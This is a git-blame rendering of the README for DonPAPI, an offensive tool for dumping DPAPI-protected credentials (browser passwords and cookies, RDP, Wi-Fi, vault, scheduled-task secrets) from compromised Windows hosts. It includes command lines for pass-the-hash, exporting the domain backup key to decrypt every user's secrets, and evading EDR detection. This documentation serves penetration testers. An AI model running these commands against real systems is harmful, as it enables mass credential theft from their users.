DonPAPI/readme.md

152 lines
4.8 KiB
Markdown
Raw Normal View History

2021-09-27 09:20:43 +00:00
# DonPAPI
2022-10-16 15:47:33 +00:00
2021-09-27 09:20:43 +00:00
Dumping revelant information on compromised targets without AV detection
2021-10-14 12:51:06 +00:00
![alt text](https://github.com/login-securite/DonPAPI/blob/main/res/Logo%20DonPapi.png)
2021-09-27 09:20:43 +00:00
## DPAPI dumping
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
Lots of credentials are protected by [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection).
2021-11-18 09:59:43 +00:00
We aim at locating those "secured" credentials, and retrieve them using :
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
- User password
- Domaine DPAPI BackupKey
- Local machine DPAPI Key (protecting `TaskScheduled` blob)
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
## Curently gathered info
2022-10-16 15:47:33 +00:00
2021-09-27 09:20:43 +00:00
- Windows credentials (Taskscheduled credentials & a lot more)
- Windows Vaults
- Windows RDP credentials
- AdConnect (still require a manual operation)
- Wifi key
2022-10-28 08:12:21 +00:00
- Internet explorer Credentials
2022-01-31 22:54:20 +00:00
- Chrome cookies & credentials
- Firefox cookies & credentials
2021-09-27 09:20:43 +00:00
- VNC passwords
- mRemoteNG password (with default config)
2021-09-27 12:59:01 +00:00
## Check for a bit of compliance
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
- SMB signing status
2021-09-27 09:20:43 +00:00
- OS/Domain/Hostname/Ip of the audited scope
2021-09-30 16:06:42 +00:00
## Operational use
With local admin account on a host, we can :
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
- Gather machine protected DPAPI secrets
- ScheduledTask that will contain cleartext login/password of the account configured to run the task
- Wi-Fi passwords
- Extract Masterkey's hash value for every user profiles (masterkeys beeing protected by the user's password, let's try to crack them with Hashcat)
- Identify who is connected from where, in order to identify admin's personal computers.
- Extract other non-dpapi protected secrets (VNC/Firefox/mRemoteNG)
- Gather protected secrets from IE, Chrome, Firefox and start reaching the Azure tenant.
With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.
## Examples
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Dump all secrets of the target machine with an admin account :
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI.py domain/user:passw0rd@target
```
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Using user's hash
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI.py --hashes <LM>:<NT> domain/user@target
```
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Using kerberos (-k) and local auth (-local_auth)
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
```
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Using a user with LAPS password reading rights
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
```bash
DonPAPI.py -laps domain/user:passw0rd@target
```
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
This credential file must have the following syntax:
```plain
user1:pass1
user2:pass2
...
```
```bash
DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target
```
When a domain admin user is available, it is possible to dump the domain backup key using impacket `dpapi.py` tool.
```bash
2021-11-18 09:59:43 +00:00
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
2021-09-30 16:06:42 +00:00
```
2021-09-27 09:20:43 +00:00
2021-11-18 09:59:43 +00:00
This backup key (pvk file) can then be used to dump all domain user's secrets!
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
`python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`
2021-09-27 09:20:43 +00:00
2021-09-30 16:06:42 +00:00
Target can be an IP, IP range, CIDR, file containing list targets (one per line)
2021-09-27 09:20:43 +00:00
2021-09-27 12:59:01 +00:00
## Opsec consideration
2022-10-16 15:47:33 +00:00
2021-09-30 16:06:42 +00:00
The RemoteOps part can be spoted by some EDR. It can be disabled using `--no_remoteops` flag, but then the machine DPAPI key won't be retrieved, and scheduled task credentials/Wi-Fi passwords won't be harvested.
2021-09-27 09:20:43 +00:00
2022-10-16 15:47:33 +00:00
## Installation
2021-09-27 09:20:43 +00:00
```
git clone https://github.com/login-securite/DonPAPI.git
2021-09-30 16:06:42 +00:00
cd DonPAPI
python3 -m pip install -r requirements.txt
2021-09-27 09:20:43 +00:00
python3 DonPAPI.py
```
2022-10-16 15:48:00 +00:00
or
```
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry install
poetry run donpapi
```
2021-09-30 16:06:42 +00:00
## Credits
2022-10-16 15:47:33 +00:00
All the credits goes to these great guys for doing the hard research & coding :
2021-09-30 16:06:42 +00:00
- Benjamin Delpy ([@gentilkiwi](https://twitter.com/gentilkiwi)) for most of the DPAPI research (always greatly commented, <3 your code)
- Alberto Solino ([@agsolino](https://twitter.com/agsolino)) for the tremendous work of Impacket (https://github.com/SecureAuthCorp/impacket). Almost everything we do here comes from impacket.
- [Alesandro Z](https://github.com/AlessandroZ) & everyone who worked on Lazagne (https://github.com/AlessandroZ/LaZagne/wiki) for the VNC & Firefox modules, and most likely for a lots of other ones in the futur.
- dirkjanm [@_dirkjan](https://twitter.com/_dirkjan) for the base code of adconnect dump (https://github.com/fox-it/adconnectdump) & every research he ever did. I learned so much on so many subjects thanks to you. <3
- [@byt3bl33d3r](https://twitter.com/byt3bl33d3r) for CME (lots of inspiration and code comes from CME : https://github.com/byt3bl33d3r/CrackMapExec )
- All the Team at [@LoginSecurite](https://twitter.com/LoginSecurite) for their help in debugging my shity code (special thanks to [@layno](https://github.com/clayno) & [@HackAndDo](https://twitter.com/HackAndDo) for that)
## Todo
2022-10-16 15:47:33 +00:00
2021-09-30 16:07:07 +00:00
- Finish ADSync/ADConnect password extraction
2021-09-27 09:20:43 +00:00
- CREDHISTORY full extraction
2021-09-30 16:06:42 +00:00
- Extract windows Certificates
- Further analysis ADAL/msteams
2021-09-30 16:07:07 +00:00
- Implement Chrome <v80 decoder
2021-09-30 16:06:42 +00:00
- Find a way to implement Lazagne's great modules
# Changelog
```
v1.0
----
Initial release
```